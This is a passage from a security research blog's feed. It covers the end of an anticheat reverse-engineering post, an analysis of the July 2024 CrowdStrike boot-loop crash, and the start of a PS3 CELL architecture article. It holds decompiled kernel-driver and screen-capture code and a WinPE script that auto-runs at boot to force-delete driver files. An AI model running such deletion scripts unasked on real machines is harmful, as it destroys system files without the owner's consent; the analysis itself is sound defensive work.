<p><code>CreateDCW</code> creates a device context handle for the display, while <code>CreateCompatibleDC</code> creates a compatible memory device context. These device contexts are essential for capturing the screen content. Interestingly, the function lacks thorough error checking, which might lead to unexpected behavior in certain scenarios. The function then retrieves the display's horizontal and vertical resolutions.</p>
<pre><code class="lang-c">HorizontalRes = GetDeviceCaps(hdcSrc, HORZRES);
VerticalRes = GetDeviceCaps(hdcSrc, VERTRES);
</code></pre>
<p>These values are used to determine the dimensions of the screenshot. Subsequently, a compatible bitmap is created with these dimensions, although the height is fixed at 16 pixels. The use of a height of 16 pixels is unusual and indicates that the screenshot will be captured in segments rather than as a whole.</p>
<pre><code class="lang-c">CompatibleBitmap = CreateCompatibleBitmap(hdcSrc, HorizontalRes, <span class="hljs-number">16</span>);
v8 = VerticalRes - <span class="hljs-number">16</span>;
<span class="hljs-keyword">for</span> (y1 = <span class="hljs-number">0</span>; y1 &lt; v8; y1 += <span class="hljs-number">16</span>)
</code></pre>
<p>Here, <code>v8</code> is the vertical resolution minus 16, and a loop iterates over the screen height in 16-pixel increments. This method is reminiscent of old CRT raster scanning, capturing the entire screen width but only 16 pixels in height per iteration. This segmentation could potentially be used for low FPS streaming as well.</p>
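<p>The loop bounds can be checked with a bit of arithmetic. The sketch below only replays the decompiled loop header (<code>y1 = 0; y1 &lt; v8; y1 += 16</code>) and assumes that each iteration captures exactly one 16-pixel strip starting at <code>y1</code>; the helper names are made up for illustration, and whether the remaining rows are handled elsewhere in the function is not visible in the snippet.</p>
<pre><code class="lang-c">#define STRIP_HEIGHT 16

/* Number of iterations of: for (y1 = 0; y1 &lt; vertical_res - 16; y1 += 16) */
static int strips_captured(int vertical_res)
{
    int count = 0;
    int limit = vertical_res - STRIP_HEIGHT;   /* v8 in the decompilation */
    for (int y1 = 0; y1 &lt; limit; y1 += STRIP_HEIGHT)
        ++count;
    return count;
}

/* Rows at the bottom of the screen that the loop, taken alone, never reaches. */
static int rows_not_covered(int vertical_res)
{
    return vertical_res - strips_captured(vertical_res) * STRIP_HEIGHT;
}
</code></pre>
<p>For a 1080-pixel-high display this gives 67 strips and leaves the bottom 8 rows untouched; for 1440 pixels it gives 89 strips and leaves the last 16 rows, so under these assumptions the loop stops slightly short of the full screen.</p>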
<p>The actual screenshot capture occurs with the <code>BitBlt</code> function. <code>BitBlt</code> transfers pixel data from the source device context to the compatible memory device context, capturing a 16-pixel high segment of the screen.</p>
<pre><code class="lang-c">BitBlt(CompatDC, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, HorizontalRes, <span class="hljs-number">16</span>, hdcSrc, <span class="hljs-number">0</span>, y1, <span class="hljs-number">0xCC0020</span>);
GetBitmapBits(CompatibleBitmap, v6, v7);
</code></pre>
<p><code>GetBitmapBits</code> then retrieves the bitmap's bits, storing them in <code>v7</code>. This raw pixel data is processed further, although the exact processing steps involve obfuscated functions likely related to OpenSSL for encryption, as hinted by the sub-functions like <code>sub_180002D80</code>. After capturing and processing the screenshot, the function cleans up the resources.</p>
<pre><code class="lang-c">v11 = SelectObject(CompatDC, v5);
DeleteObject(v11);
DeleteDC(CompatDC);
<span class="hljs-keyword">return</span> DeleteDC(DCW);
</code></pre>
<p>The cleanup ensures that device contexts and objects are properly released, preventing resource leaks.</p>
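<p>Going back to the <code>GetBitmapBits</code> call: its second argument is a byte count and its third is the destination buffer, so <code>v6</code> is presumably the size of one 16-pixel strip. A rough sketch of how such a size could be computed is below. The bit depth is an assumption (it depends on the display mode), the helper name is made up, and the 2-byte alignment of each scanline follows the documented rule for device-dependent bitmaps.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;

#define STRIP_HEIGHT 16

/* Bytes needed to hold one strip of a device-dependent bitmap.
   Each scanline is padded to a multiple of 2 bytes (word aligned). */
static size_t strip_buffer_bytes(size_t width_px, size_t bits_per_pixel)
{
    size_t bits_per_line  = width_px * bits_per_pixel;
    size_t bytes_per_line = ((bits_per_line + 15) / 16) * 2;
    return bytes_per_line * STRIP_HEIGHT;
}
</code></pre>
<p>For a 1920-pixel-wide display at 32 bits per pixel this comes out to 122880 bytes per strip, a small and fixed-size chunk to process each iteration.</p>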
<p>All of this suggests that ACE has the capability to capture and potentially transmit comprehensive screenshots, including sensitive information unrelated to the game. This functionality could be triggered under specific conditions, such as when cheating is detected or reported, which is way more aggressive than what Vanguard does.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>This is definitely a non-exhaustive list of the techniques being used. i have glossed over a lot of other protection methods, like <a target="_blank" href="https://reversing.info/posts/guardedregions/">Vanguard's guarded memory regions</a>, which are too complex for a simple subsection to explain. But this should provide you guys with a general overview of how most of these systems work.</p>
<p>To be fully honest, even though i do not trust Riot Games (owned by Tencent, a Chinese entity) or MiHoYo (a Chinese entity), if they were to do something such as stealing personal user information, it would've probably already been found out by now, given the number of people trying to crack apart mhyprot and Vanguard. The same applies to other anticheat systems like BattlEye, EAC, VAC, etc.</p>
<p>Is the fear of kernel-level anticheats overblown? Perhaps, but one must consider that, based on all of the techniques we discussed above, kernel-level anticheats can:</p>
<ul>
<li><p>Have nearly limitless access to your device and data, including connected devices and data in-memory</p>
</li>
<li><p>Conduct aggressive integrity checks that can lead to false positives, causing legitimate processes to crash or behave unpredictably</p>
</li>
<li><p>Harm attempts to play games on alternative platforms, such as Linux through Proton/Wine</p>
</li>
<li><p>Interfere with the operation of legitimate security software that relies on accessing certain core Windows systems, potentially reducing the effectiveness of these tools</p>
</li>
</ul>
<p>Anticheats also get away with hooking things that would usually trigger EDR alerts, which gives them some interesting EDR bypass capabilities.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1719144129494/8e8568b6-8542-4100-b131-8f1b9214dfe9.png" alt class="image--center mx-auto" /></p>
<p>For me personally, these are not tradeoffs that i'm willing to make in order to play games on the internet. I've also blacklisted common anticheat processes and binaries in major EDR platforms.</p>
<p>But i've never been fond of competitive or gacha games anyway, as i usually enjoy more singleplayer-oriented games. The tolerance and preferences of other people might be different, however, and i do think kernel-level anticheats are important to ensure fair play inside competitive games that even have <a target="_blank" href="https://www.dexerto.com/valorant/valorant-champions-2023-to-offer-record-prize-pool-2228107/">professional leagues with million-dollar prize pools</a> or <a target="_blank" href="https://www.pcgamesn.com/genshin-impact/whale-account">have accounts that can sell for up to six figures</a>.</p>
<p>This article was only meant to introduce people to the concept of kernel-level anticheats, which are sometimes shrouded in mystery due to their sensitive nature and the heavy amount of obfuscation that developers put into these systems. Most of you guys have probably already made up your minds about this issue, and if you haven't, i hope this article helped you form an informed opinion.</p>
]]></content:encoded></item><item><title><![CDATA[Quick Analysis About the Crowdstrike Situation]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

DISCLAIMER : This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code may be simplified and edited to provide clarity or to maintain ...]]></description><link>https://research.meekolab.com/quick-analysis-about-the-crowdstrike-situation</link><guid isPermaLink="true">https://research.meekolab.com/quick-analysis-about-the-crowdstrike-situation</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 21 Jul 2024 09:51:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500257188/daf25d42-7e16-44e8-bdb9-e2c274eb6326.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
<hr />
<p><strong><em>DISCLAIMER : This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code may be simplified and edited to provide clarity or to maintain confidentiality.</em></strong></p>
</blockquote>
<p>On Friday, July 19th 2024, a faulty update pushed by Crowdstrike to its Falcon EDR caused machines around the world to bluescreen and get stuck in an infinite bootloop. This <a target="_blank" href="https://www.reuters.com/technology/cybersecurity/crowdstrike-update-that-caused-global-outage-likely-skipped-checks-experts-say-2024-07-20/">has caused havoc globally</a>, with <a target="_blank" href="https://blogs.microsoft.com/blog/2024/07/20/helping-our-customers-through-the-crowdstrike-outage/">Microsoft saying</a> that around 8.5 million endpoints were affected.</p>
<p>So instead of relaxing like a normal person on a weekend, i decided to take a look (because i wanted twitter clout). One of the questions is what caused the BSOD and bootloop situation, and why did removing a <code>.sys</code> file help with the situation?</p>
<p>This article would not be possible without :</p>
<ul>
<li><p>Patrick Wardle, who provided the kernel driver for Crowdstrike and the offending channel files</p>
</li>
<li><p>Tavis Ormandy for initial analysis</p>
</li>
<li><p>Aliz Hammond and Kyle Avery for final checking and editing because i wrote this half asleep</p>
</li>
</ul>
<h1 id="heading-analysis">Analysis</h1>
<h3 id="heading-checking-the-crash-logs-and-official-workaround">Checking the Crash Logs and Official Workaround</h3>
<blockquote>
<p>DISCLAIMER : Some screenshots and crash logs were edited for confidentiality purposes</p>
</blockquote>
<p>Checking the crash logs for the csagent.sys driver revealed some interesting clues.</p>
<pre><code class="lang-c">EXCEPTION_RECORD: fffffb0d18d3ec28 -- (.exr <span class="hljs-number">0xfffffb0d18d3ec28</span>)
ExceptionAddress: fffff80d21df335a1 (csagent+<span class="hljs-number">0x0000000000035a1</span>)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: <span class="hljs-number">00000000</span>
NumberParameters: <span class="hljs-number">2</span>
    Parameter[<span class="hljs-number">0</span>]: <span class="hljs-number">0000000000000000</span>
    Parameter[<span class="hljs-number">1</span>]: <span class="hljs-number">000000000000009</span>c
Attempt to read from address <span class="hljs-number">000000000000009</span>c

CONTEXT: fffffb0d18d3e460 -- (.cxr <span class="hljs-number">0xfffffb0d18d3e460</span>)
rax=ffffffb0d18d43f0 rbx=<span class="hljs-number">0000000000000240</span> rcx=<span class="hljs-number">0000000000000234</span>
rdx=ffffffb0d18d5430 rsi=ffffff9a815b7835 rdi=ffffff9a815b7925
rip=ffff80d21df335a1 rsp=ffffffb0d18d3ef40 rbp=ffffffb0d18d3f50
 r8=<span class="hljs-number">000000000000009</span>c  r9=ffffffb0d18d3e75 r10=ffffffb0d18d4f2c
r11=ffffffb0d18d4124 r12=ffffffb0d18d4128 r13=ffffffb0d18d41d0
r14=<span class="hljs-number">0000000000000030</span> r15=<span class="hljs-number">0000000000000120</span>
iopl=<span class="hljs-number">0</span>         nv up ei pl nz na po nc
cs=<span class="hljs-number">0010</span> ss=<span class="hljs-number">0018</span> ds=<span class="hljs-number">002b</span> es=<span class="hljs-number">002b</span> fs=<span class="hljs-number">0053</span> gs=<span class="hljs-number">002b</span>             efl=<span class="hljs-number">00050206</span>
csagent+<span class="hljs-number">0x35a1</span>:
fffff80d21df335a1 <span class="hljs-number">458b</span>08          mov     r9d,dword ptr [r8] ds:<span class="hljs-number">002b</span>:<span class="hljs-number">00000000</span>`<span class="hljs-number">0000009</span>c=???????? 

Resetting <span class="hljs-keyword">default</span> scope
</code></pre>
<p>An examination of the context record reveals the state of the CPU registers at the time of the exception. The instruction pointer (RIP) was at <code>fffff80d21df335a1</code>, and it attempted to execute the instruction <code>mov r9d, dword ptr [r8]</code>. This instruction tried to move data from the memory address pointed to by <code>r8</code> into the <code>r9d</code> register. However, the address in <code>r8</code> was <code>000000000000009c</code>, which is invalid and resulted in the access violation.</p>
<p><a target="_blank" href="https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/">Crowdstrike's official workaround post</a> also provided some interesting clues.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721478411684/86fe7b5c-a60d-4fa7-9703-1f4112fe0993.png" alt class="image--center mx-auto" /></p>
<p>The instructions advised users to boot into safe mode, locate a file called <code>C-00000291*.sys</code> in Crowdstrike's driver directory, and delete it, which is interesting. This directory is where Crowdstrike's kernel-mode drivers are stored, and we have talked at length about the risks of kernel-mode drivers, both <a target="_blank" href="https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass">in EDRs</a> and in <a target="_blank" href="https://research.meekolab.com/analyzing-genshin-impacts-anticheat-module">anticheat programs</a>. But the folder itself contains tons of <code>.sys</code> files, which raises the question: why does Crowdstrike need so many kernel-mode drivers?</p>
<p>A later <a target="_blank" href="https://www.crowdstrike.com/blog/technical-details-on-todays-outage/">technical writeup published by Crowdstrike</a> detailed how these files, despite their <code>.sys</code> extensions, are actually what's called <a target="_blank" href="https://supportportal.crowdstrike.com/s/article/ka16T000000wuddQAA">Channel Files</a>, which contain behavioral detection signatures for the EDR platform.</p>
<h3 id="heading-checking-the-channel-files-and-kernel-driver">Checking the Channel Files and Kernel Driver</h3>
<p>The aforementioned technical writeup stated that the problematic Channel File (<code>C-00000291-*</code> with a <code>.sys</code> extension) controlled how Crowdstrike evaluates named pipes in Windows, and that it was being updated at the time to account for a new named pipe technique being leveraged by common C2 frameworks. However, the post didn't go into much detail about what it was actually trying to detect.</p>
<p>The timing, however, closely coincided with the release of <a target="_blank" href="https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate">Cobaltstrike's new Aggressor Function</a>, which can send arbitrary data to a custom post-exploitation job via a named pipe, providing significant flexibility in how post-ex tasks are executed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721479433026/7d21f071-f97b-4106-b90a-5ffd64606131.png" alt class="image--center mx-auto" /></p>
<p>This function empowers operators to send specific data strings to custom post-exploitation jobs, which can be used to build dynamic and context-specific execution of post-ex tasks, such as adaptive data exfiltration or automated response triggers. The general consensus is that <code>C-00000291-00000000-00000032.sys</code> is the offending channel file for this issue.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721480229519/67b48d89-6cce-4463-9abf-201c66d0c4bc.png" alt="(Fig 1) Screenshot floating around on Twitter" class="image--center mx-auto" /></p>
<p>There was an early tweet with this screenshot that says this file is full of zeroes, which would've implied that Crowdstrike pushed a signature file filled with null values. But as far as i can tell, this is definitely not the case for the many samples i've gathered so far. The files do appear to be obfuscated, probably to stop competitors from reading their channel files and figuring out their heuristic detection models.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721480380782/4af523e2-b0bf-4ae2-9079-8043dbe83d4f.png" alt class="image--center mx-auto" /></p>
<p>Inside Crowdstrike's driver we can read further how the driver interacts with the channel files.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500342377/0aa7b321-d041-42cd-93d5-f0a0c02e299b.png" alt class="image--center mx-auto" /></p>
<p>The driver searches for a filename using the format string <code>C-%08u-%08u-%08u.sys</code> and then loads this into <code>rdx</code>. It's not possible to know for sure what logic error inside the channel file caused the condition, because the file is obfuscated, but invalid signature data probably triggered a fault in the kernel-mode driver.</p>
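<p>As a quick illustration of what that format string produces, here is a small user-mode sketch using the standard <code>snprintf</code>. The helper and its parameter names are placeholders, since what each numeric field means is not known from the disassembly, and the driver itself will be using kernel string routines rather than this call.</p>
<pre><code class="lang-c">#include &lt;stdio.h&gt;

/* Builds a channel file name from three unsigned fields, each zero-padded
   to eight decimal digits. Returns the value reported by snprintf. */
static int build_channel_file_name(char *out, size_t out_size,
                                   unsigned first, unsigned second, unsigned third)
{
    return snprintf(out, out_size, "C-%08u-%08u-%08u.sys", first, second, third);
}
</code></pre>
<p>Calling it with <code>291</code>, <code>0</code>, and <code>32</code> yields <code>C-00000291-00000000-00000032.sys</code>, the name of the offending channel file.</p>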
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500331762/54883851-d11d-4034-b983-0f3e89c7dae9.png" alt class="image--center mx-auto" /></p>
<p>The driver tried to read the pointer at index 0x14 of a buffer (<code>mov r8, [rax+r11*8]</code>), using <code>rax</code> as the base address and a scaled index as the offset. It seems like the code included a check to ensure that <code>r8</code> is not null before attempting to read from it: <code>test r8, r8</code> checks whether <code>r8</code> is non-zero, and if it is, execution jumps to <code>loc_1400E14F4</code>.</p>
<p>The problem is that this null check only ensures that <code>r8</code> is not zero; it doesn't verify whether <code>r8</code> points to a valid and accessible memory address. Because of this, the invalid address <code>0x9c</code> seen in the crash log passes the check and execution continues on to the next instruction.</p>
<p>That instruction, shown in the crash log as <code>mov r9d, dword ptr [r8]</code>, reads a 32-bit value from the address pointed to by <code>r8</code>, so an invalid address in <code>r8</code> causes a crash as soon as the read is attempted.</p>
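<p>The gap between "not null" and "valid" can be shown without dereferencing anything. In the sketch below, the first function mirrors what <code>test r8, r8</code> establishes, while the second is a hypothetical, stricter filter that rejects the lowest 64 KiB (the range Windows keeps unmapped to catch null-pointer bugs). Both names are made up, and neither is taken from the driver.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* What `test r8, r8` plus the conditional jump establishes: r8 != 0. */
static bool passes_null_check(uintptr_t address)
{
    return address != 0;
}

/* Hypothetical stricter filter: also reject the lowest 64 KiB. This is
   still only a heuristic and says nothing about whether a higher address
   is actually mapped and readable. */
static bool passes_low_address_filter(uintptr_t address)
{
    return address &gt;= 0x10000u;
}
</code></pre>
<p>The address from the crash log, <code>0x9c</code>, passes the first check and fails the second. Even the stricter filter is only a band-aid, though; validating the channel file data and the index before the pointer is ever fetched would be the more robust approach.</p>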
<h3 id="heading-why-the-bootloop">Why the bootloop?</h3>
<p>Third-party kernel-mode drivers are usually loaded only after the system has completed the boot process. But these crashes seem to hit machines before they even get into the OS, so what's actually happening?</p>
<p>As part of the Microsoft Virus Initiative (MVI), Crowdstrike has special privileges through Windows's Early Launch Anti-Malware (ELAM) feature. ELAM allows security vendors to build kernel-mode drivers that load early during bootup, before third-party drivers initialize. This can enable detection of malicious third-party kernel-mode drivers and rootkits.</p>
<p>When the driver read the new channel file, it performed an invalid memory access, which caused a bluescreen. Then, during the subsequent restart, the driver reloaded the channel file and caused another BSOD during boot, which put the system into Recovery Mode and caused the bootloop.</p>
<p>There are strict requirements for building ELAM drivers: a vendor's drivers have to pass <a target="_blank" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/elam-driver-requirements">certain requirements</a> from Microsoft through testing and certification. But since these channel files weren't considered part of the driver, they didn't need to be signed off by Microsoft.</p>
<h1 id="heading-solution">Solution</h1>
<blockquote>
<p>EDIT : Microsoft has released a dedicated tool for this exact purpose, check out <a target="_blank" href="https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959">here</a></p>
</blockquote>
<p>There isn't really a magic bullet solution to this. Since the driver loads before other third-party drivers like MDMs, it's not like you can push out a GPO or a command via an MDM to remove these files. You'd likely have to go to the machines physically, one by one, and boot into safe mode to delete the faulty channel files manually.</p>
<p>You can use something like the Windows Preinstallation Environment (WinPE) to significantly speed up the procedure, which makes this much easier to do at scale. The steps below create a bootable USB from WinPE media with a script that automatically runs, deletes the problematic CrowdStrike files, and reboots the system.</p>
<h3 id="heading-prerequisites">Prerequisites</h3>
<ol>
<li><p>Windows Assessment and Deployment Kit (ADK) for Windows 10 or later</p>
</li>
<li><p>Windows PE add-on for the ADK</p>
</li>
<li><p>Administrative privileges on a Windows 10 or later system</p>
</li>
</ol>
<h3 id="heading-steps">Steps</h3>
<ol>
<li><p><strong>Install Windows ADK and Windows PE add-on</strong> Download and install both from the Microsoft website.</p>
</li>
<li><p><strong>Create a working copy of Windows PE files</strong> Open Command Prompt as Administrator and run:</p>
<pre><code class="lang-c"> copype amd64 C:\WinPE_amd64
</code></pre>
</li>
<li><p><strong>Mount the Windows PE image</strong></p>
<pre><code class="lang-c"> Dism /Mount-Image /ImageFile:<span class="hljs-string">"C:\WinPE_amd64\media\sources\boot.wim"</span> /Index:<span class="hljs-number">1</span> /MountDir:<span class="hljs-string">"C:\WinPE_amd64\mount"</span>
</code></pre>
</li>
<li><p><strong>Create a startup script</strong> Create a file named <code>startnet.cmd</code> in <code>C:\WinPE_amd64\mount\Windows\System32</code> with the following content:</p>
<pre><code class="lang-c"> wpeinit
 powershell -Command <span class="hljs-string">"Remove-Item -Path '$env:SystemDrive\Windows\System32\drivers\CrowdStrike\C-00000291*.sys' -Force"</span>
 shutdown /f /r /t <span class="hljs-number">0</span>
</code></pre>
</li>
<li><p><strong>Modify the Windows PE configuration</strong> Edit <code>C:\WinPE_amd64\mount\Windows\System32\winpeshl.ini</code>:</p>
<pre><code class="lang-c"> [LaunchApps]
 %SYSTEMROOT%\System32\startnet.cmd
</code></pre>
</li>
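<li><p><strong>Add PowerShell support to WinPE</strong> The WinPE-PowerShell package depends on WinPE-WMI, WinPE-NetFX, and WinPE-Scripting, so add those packages first (in that order, from the same <code>WinPE_OCs</code> folder) and then run:</p>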
<pre><code class="lang-c"> Dism /Add-Package /Image:<span class="hljs-string">"C:\WinPE_amd64\mount"</span> /PackagePath:<span class="hljs-string">"C:\Program Files (x86)\Windows Kits\10\Assessment and Deployment Kit\Windows Preinstallation Environment\amd64\WinPE_OCs\WinPE-PowerShell.cab"</span>
</code></pre>
</li>
<li><p><strong>Unmount and commit changes</strong></p>
<pre><code class="lang-c"> Dism /Unmount-Image /MountDir:<span class="hljs-string">"C:\WinPE_amd64\mount"</span> /Commit
</code></pre>
</li>
<li><p><strong>Create bootable media</strong></p>
<pre><code class="lang-c"> MakeWinPEMedia /UFD C:\WinPE_amd64 E:
</code></pre>
<p> *Replace E: with your USB drive letter</p>
</li>
</ol>
<p>For devices with BitLocker, there are some workarounds to <a target="_blank" href="https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/#:~:text=a%20recovery%20key.-,How%20do%20I%20Recover%20Bitlocker%20Keys%3F,-Updated%202024%2D07">retrieve the BitLocker key</a> using various methods.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Who is to blame? Probably CrowdStrike.</p>
<p>But building kernel drivers is hard, and they are even harder to QA. This isn't to excuse CrowdStrike, who basically made a kernel driver that loads hotpatches from userland. Because of the nature of the ELAM certification process and lapses in QA practices at CrowdStrike, this possibly passed a lot of eyes and was deployed haphazardly to production.</p>
<p>I've talked previously in my post about <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products#heading-limitations-of-kext-based-security-products">EndpointSecurity in macOS</a> about how building kernel-mode drivers carries tremendous risks to security and OS stability. While there has recently been more discussion about <code>EndpointSecurity</code> and how it might be too restrictive, I still maintain that this is a good solution to avoid these types of disasters.</p>
<p>Many argue that creating usermode telemetry pipelines creates a single point of failure, but this is currently no different to the approaches used by vendors today like kernel callbacks and ETW-TI.</p>
<p>Microsoft tried to introduce security boundaries like this with <a target="_blank" href="https://research.meekolab.com/bypassing-kernel-patch-protections-on-windows">Kernel Patch Protection (KPP)</a>, but was met with <a target="_blank" href="https://web.archive.org/web/20070217053224/http://www.windows-now.com/blogs/robert/archive/2006/08/12/PatchGuard-and-Symantecs-Complaints-About-Windows-Vista.aspx">stiff opposition from cybersecurity vendors</a>. The European Commission also targeted Microsoft with an antitrust investigation due to its inclusion of KPP.</p>
<p><a target="_blank" href="https://web.archive.org/web/20070202190644/http://software.silicon.com/os/0,39024651,39163525,00.htm">To quote</a> :</p>
<blockquote>
<p>"The second Vista security area causing the EC concern was PatchGuard, or kernel patch protection, the code that prevents access to the Vista kernel. Security vendors McAfee and Symantec were <strong>incensed</strong> they were banned from the kernel. The EC wanted Microsoft to disable this feature but Microsoft refused."</p>
</blockquote>
<p>The issue was purely that when PatchGuard was introduced, Microsoft didn't really provide a userland telemetry equivalent for security vendors. I think the goal shouldn't be to remove all third-party code from the kernel, but at least to give more usermode telemetry so these types of operations are not as necessary as before.</p>
<p>Are people gonna move out of CrowdStrike for this? Probably. Management types, especially non-technical ones, are impatient and think they can buy their way out of any problem. They think EDRs are magic black boxes that can stop breaches, but many forget that CrowdStrike is market-leading not because their software has some secret sauce (it doesn't, all EDRs are basically the same product skinned with a different UI) but because of the human capital behind it, from its research and managed defense teams.</p>
<p>But alas, one can dream.</p>
]]></content:encoded></item><item><title><![CDATA[Exploring the Power of Parallelized CPU Architectures]]></title><description><![CDATA[Cover Illustration by hi__dan

In a recent trip from Japan, i came to score a rare PS3 reference tool (DECR-1000J) which was sold below market rates. As these things are apparently very rare and are not regionlocked unlike the retail models, i took t...]]></description><link>https://research.meekolab.com/exploring-the-power-of-parallelized-cpu-architectures</link><guid isPermaLink="true">https://research.meekolab.com/exploring-the-power-of-parallelized-cpu-architectures</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 30 May 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1718425768409/3b826e17-6ba2-43fc-a988-e680e8166347.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by hi__dan</em></strong></p>
</blockquote>
<p>On a recent trip from Japan, I managed to score a rare PS3 reference tool (<a target="_blank" href="https://www.psdevwiki.com/ps3/DECR-1000J">DECR-1000J</a>) which was sold below market rates. As these things are apparently very rare and are not region-locked unlike the retail models, I took the chance to buy it to serve as a learning platform. Unfortunately, I lost the unit during a home invasion incident while I was out of the country over the weekend, alongside several valuables and my work laptop. I'm not exactly sure what they were planning to do with a rackmountable PS3, but alas I was not destined to play around with it for long.</p>
<p>I've always seen the architecture of the PS3, the CELL Broadband Engine, as some sort of mythical creature. After looking online for tutorials on how to <a target="_blank" href="https://www.psx-place.com/threads/ps3-decr-1000a-3-15-deh-mfw-unlocked-hidden-option-to-boot-linux-in-3-15.9490/">install Linux</a> on it, I got to work on figuring out what I could possibly use this for, or what I could write about it that hasn't been endlessly written before. That's when I got the idea to port a math library routine to the CELL SPU, utilizing its SIMD and ILP features to speed up the process.</p>
<p>Funnily enough, a startup called <a target="_blank" href="https://flow-computing.com/technology/">Flow Computing</a> recently appeared with some graphs (and names) that look suspiciously similar to how the CELL BE architecture works. The startup claims that their new "CPU 2.0" architecture is able to accelerate CPU workloads up to 100x, which is (sorta) believable knowing that they're not some scrappy shady startup but a spinout of VTT Technical Research Center from Finland.</p>
<p>This article (probably closer to an academic paper at this point) would not be possible without :</p>
<ul>
<li><p>Francesco Mazzoli on <a target="_blank" href="https://mazzo.li/posts/vectorized-atan2.html">speeding atan2f by 50x</a> through AVX-512 instructions which serves as the initial inspiration for this article</p>
</li>
<li><p>Mike Acton from B3D@CellPerformance for the <a target="_blank" href="https://web.archive.org/web/20240229184719/https://cellperformance.beyond3d.com/articles/2006/09/atan2-on-spu.html">sequential implementation of atan2</a> in the CELL SPU (archive link)</p>
</li>
<li><p>IBM's <a target="_blank" href="https://web.archive.org/web/20100413024202/http://www.ibm.com/developerworks/power/cell/documents.html?S_TACT=105AGX16&amp;S_CMP=LP">CELL Broadband Engine Resource Center</a> (archive link), specifically the following docs</p>
<ul>
<li><p>Cell Broadband Engine Programmer's Guide</p>
</li>
<li><p>Cell Broadband Engine Programming Tutorial</p>
</li>
<li><p>Cell Broadband Engine Programming Handbook</p>
</li>
<li><p>SIMD Math Library Specification for Cell Broadband Engine Architecture</p>
</li>
<li><p>C/C++ Language Extensions for Cell Broadband Engine Architecture</p>
</li>
</ul>
</li>
<li><p><a target="_blank" href="https://files.maikxchd.com/cellbe-best-programming-20091211.pdf">The Best Programming Practice for Cell/BE</a> (self archive link) by Akira Tsukamoto (Sony CELL BE team)</p>
</li>
<li><p>This <a target="_blank" href="https://www.dentsubo.net/circle/spe256f.html">doujinshi</a> from Japan which contains the most detailed account of programming with CELL SPE cores; it's in Japanese and fully absurd</p>
</li>
<li><p>That one guy from University of Indonesia (UI) Computer Science Faculty (Fasilkom) that said <code>i'm not a programmer</code> because I cannot do leetcode algorithms</p>
</li>
</ul>
<h1 id="heading-background">Background</h1>
<p>The Cell processor, developed by Sony, Toshiba, and IBM as part of the STI alliance, was an ambitious and highly unconventional processor design that promised extraordinary computational power. Introduced in the PlayStation 3 in 2006, the Cell architecture aimed to leverage the parallel processing capabilities of multiple specialized co-processors.</p>
<p>To understand why the CELL architecture is so weird, you need to understand that during the early 2000s the traditional approach of enhancing performance by increasing clock frequencies was reaching its limits. Intel's Pentium architecture could not evolve further, and its promised successor was nowhere to be found. Similarly, IBM's PowerPC G5 processors failed to deliver on the promised 3 GHz clock speed. People were calling this <a target="_blank" href="https://www.technologyreview.com/2000/05/01/236362/the-end-of-moores-law/">the end of Moore's law</a>.</p>
<p>While there <a target="_blank" href="https://en.wikipedia.org/wiki/Sch%C3%B6n_scandal">were a lot of ideas</a> thrown around on how to fundamentally rework computing architectures to better scale performance, many thought that moving from a monolithic processing design to a split-workload design, where multiple smaller machines collaborate to distribute the compute task, could work. This is similar to how we do cloud workloads today with microservices.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424039668/84f32ec1-c242-4b7e-a880-cce30e5561fb.png" alt class="image--center mx-auto" /></p>
<p>The CELL's general-purpose "leader" core, known as the PowerPC Processing Element (PPE), was responsible for directing the overall operation of the CELL circuitry. It acted as the central processing unit, managing the workload and delegating tasks to the "assistant" cores.</p>
<p>The CELL architecture has been classified as a Network-on-Chip (NoC) rather than a traditional System-on-Chip (SoC) due to its unconventional data bus design, known as the Element Interconnect Bus (EIB). The EIB is a novel interconnect topology devised by IBM to address the performance bottlenecks and congestion issues faced by demanding CPU components in previous architectures.</p>
<p>Unlike traditional single bus topologies, the token ring topology employed by the EIB aims to tackle large amounts of concurrent traffic. Data is transferred in the form of 128-bit packets, and each ring can accommodate up to three concurrent transfers, provided that the packets do not overlap.</p>
<p>In addition to the EIB for networking different parts of the CELL architecture, the system incorporates several high-performance interfaces responsible for data movement and communication. These interfaces include:</p>
<ul>
<li><p><strong>Broadband Engine Interface Unit (BEI)</strong>: Responsible for facilitating communication between the CELL and external devices or systems.</p>
</li>
<li><p><strong>Memory Interface Controller (MIC)</strong>: Manages access to the main memory, with preferential priority on the EIB.</p>
</li>
<li><p><strong>Flex I/O buses</strong>: Provide additional I/O capabilities for the CELL architecture.</p>
</li>
</ul>
